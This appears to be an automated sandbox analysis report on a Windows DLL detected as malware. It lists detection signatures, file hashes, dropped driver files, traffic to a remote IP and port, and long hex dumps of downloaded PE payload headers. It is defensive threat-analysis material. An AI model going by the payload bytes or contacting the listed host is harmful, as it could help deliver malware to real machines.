Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll
Analysis ID: 1416972
MD5: 3bfb35c4054f9b59a8b64817aa292780
SHA1: 9d126f746caf39749551574a049adf9d1e8af649
SHA256: d2ca8563455b3e2cc8b2942a4026dddb324cb37262c27432ba1fcd975303e44a
Tags: dll
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Potentially malicious time measurement code found
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to load drivers
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables driver privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1] Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2] Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1] Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Temp\1340820F.sys ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1340820F.sys Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Temp\1341015D.sys ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1341015D.sys Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys Virustotal: Detection: 52% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Virustotal: Detection: 23% Perma Link
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Joe Sandbox ML: detected
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 134.175.236.132 17598 Jump to behavior
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 134.175.236.132 ports 17598,1,5,7,8,9
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 134.175.236.132:17598
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept: text/plain, text/htmlContent-Length: 125232Connection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 35 c6 f1 61 54 a8 a2 61 54 a8 a2 61 54 a8 a2 75 3f a9 a3 62 54 a8 a2 61 54 a9 a2 40 54 a8 a2 75 3f ab a3 63 54 a8 a2 75 3f ac a3 62 54 a8 a2 a9 21 ad a3 63 54 a8 a2 a9 21 aa a3 60 54 a8 a2 52 69 63 68 61 54 a8 a2 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 50 27 93 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 1e 00 00 00 0c 00 00 00 00 00 00 00 60 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 01 00 00 00 00 00 00 e0 01 00 00 04 00 00 30 41 02 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 01 00 00 00 82 01 00 30 67 00 00 00 d0 01 00 2c 00 00 00 b0 30 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 30 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 18 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 8c 04 00 00 00 30 00 00 00 06 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 28 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 20 01 00 00 00 50 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 c0 02 00 00 00 60 00 00 00 04 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 56 53 4b 30 00 00 00 72 52 01 00 00 70 00 00 00 54 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 65 6c 6f 63 00 00 2c 00 00 00 00 d0 01 00 00 02 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept: text/plain, text/htmlContent-Length: 125232Connection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 35 c6 f1 61 54 a8 a2 61 54 a8 a2 61 54 a8 a2 75 3f a9 a3 62 54 a8 a2 61 54 a9 a2 40 54 a8 a2 75 3f ab a3 63 54 a8 a2 75 3f ac a3 62 54 a8 a2 a9 21 ad a3 63 54 a8 a2 a9 21 aa a3 60 54 a8 a2 52 69 63 68 61 54 a8 a2 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 50 27 93 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 1e 00 00 00 0c 00 00 00 00 00 00 00 60 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 01 00 00 00 00 00 00 e0 01 00 00 04 00 00 30 41 02 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 01 00 00 00 82 01 00 30 67 00 00 00 d0 01 00 2c 00 00 00 b0 30 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 30 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 18 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 8c 04 00 00 00 30 00 00 00 06 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 28 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 20 01 00 00 00 50 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 c0 02 00 00 00 60 00 00 00 04 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 56 53 4b 30 00 00 00 72 52 01 00 00 70 00 00 00 54 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 65 6c 6f 63 00 00 2c 00 00 00 00 d0 01 00 00 02 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept: text/plain, text/htmlContent-Length: 109632Connection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 35 c6 f1 61 54 a8 a2 61 54 a8 a2 61 54 a8 a2 75 3f a9 a3 62 54 a8 a2 61 54 a9 a2 40 54 a8 a2 75 3f ab a3 63 54 a8 a2 75 3f ac a3 62 54 a8 a2 a9 21 ad a3 63 54 a8 a2 a9 21 aa a3 60 54 a8 a2 52 69 63 68 61 54 a8 a2 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 50 27 93 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 1e 00 00 00 0c 00 00 00 00 00 00 00 60 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 01 00 00 00 00 00 00 e0 01 00 00 04 00 00 1f 29 02 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 01 00 00 00 82 01 00 40 2a 00 00 00 d0 01 00 2c 00 00 00 b0 30 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 30 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 18 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 8c 04 00 00 00 30 00 00 00 06 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 28 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 20 01 00 00 00 50 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 c0 02 00 00 00 60 00 00 00 04 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 56 53 4b 30 00 00 00 72 52 01 00 00 70 00 00 00 54 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 65 6c 6f 63 00 00 2c 00 00 00 00 d0 01 00 00 02 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept: text/plain, text/htmlContent-Length: 109632Connection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 35 c6 f1 61 54 a8 a2 61 54 a8 a2 61 54 a8 a2 75 3f a9 a3 62 54 a8 a2 61 54 a9 a2 40 54 a8 a2 75 3f ab a3 63 54 a8 a2 75 3f ac a3 62 54 a8 a2 a9 21 ad a3 63 54 a8 a2 a9 21 aa a3 60 54 a8 a2 52 69 63 68 61 54 a8 a2 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 50 27 93 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 1e 00 00 00 0c 00 00 00 00 00 00 00 60 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 01 00 00 00 00 00 00 e0 01 00 00 04 00 00 1f 29 02 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 01 00 00 00 82 01 00 40 2a 00 00 00 d0 01 00 2c 00 00 00 b0 30 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 30 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 18 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 8c 04 00 00 00 30 00 00 00 06 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 28 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 20 01 00 00 00 50 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 c0 02 00 00 00 60 00 00 00 04 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 56 53 4b 30 00 00 00 72 52 01 00 00 70 00 00 00 54 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 65 6c 6f 63 00 00 2c 00 00 00 00 d0 01 00 00 02 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept: text/plain, text/htmlContent-Length: 125232Connection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 35 c6 f1 61 54 a8 a2 61 54 a8 a2 61 54 a8 a2 75 3f a9 a3 62 54 a8 a2 61 54 a9 a2 40 54 a8 a2 75 3f ab a3 63 54 a8 a2 75 3f ac a3 62 54 a8 a2 a9 21 ad a3 63 54 a8 a2 a9 21 aa a3 60 54 a8 a2 52 69 63 68 61 54 a8 a2 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 50 27 93 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 1e 00 00 00 0c 00 00 00 00 00 00 00 60 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 01 00 00 00 00 00 00 e0 01 00 00 04 00 00 30 41 02 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 01 00 00 00 82 01 00 30 67 00 00 00 d0 01 00 2c 00 00 00 b0 30 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 30 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 18 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 8c 04 00 00 00 30 00 00 00 06 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 28 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 20 01 00 00 00 50 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 c0 02 00 00 00 60 00 00 00 04 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 56 53 4b 30 00 00 00 72 52 01 00 00 70 00 00 00 54 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 65 6c 6f 63 00 00 2c 00 00 00 00 d0 01 00 00 02 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept: text/plain, text/htmlContent-Length: 109632Connection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 35 c6 f1 61 54 a8 a2 61 54 a8 a2 61 54 a8 a2 75 3f a9 a3 62 54 a8 a2 61 54 a9 a2 40 54 a8 a2 75 3f ab a3 63 54 a8 a2 75 3f ac a3 62 54 a8 a2 a9 21 ad a3 63 54 a8 a2 a9 21 aa a3 60 54 a8 a2 52 69 63 68 61 54 a8 a2 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 50 27 93 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 1e 00 00 00 0c 00 00 00 00 00 00 00 60 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 01 00 00 00 00 00 00 e0 01 00 00 04 00 00 1f 29 02 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 01 00 00 00 82 01 00 40 2a 00 00 00 d0 01 00 2c 00 00 00 b0 30 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 30 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 18 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 8c 04 00 00 00 30 00 00 00 06 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 28 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 20 01 00 00 00 50 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 c0 02 00 00 00 60 00 00 00 04 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 56 53 4b 30 00 00 00 72 52 01 00 00 70 00 00 00 54 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 65 6c 6f 63 00 00 2c 00 00 00 00 d0 01 00 00 02 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 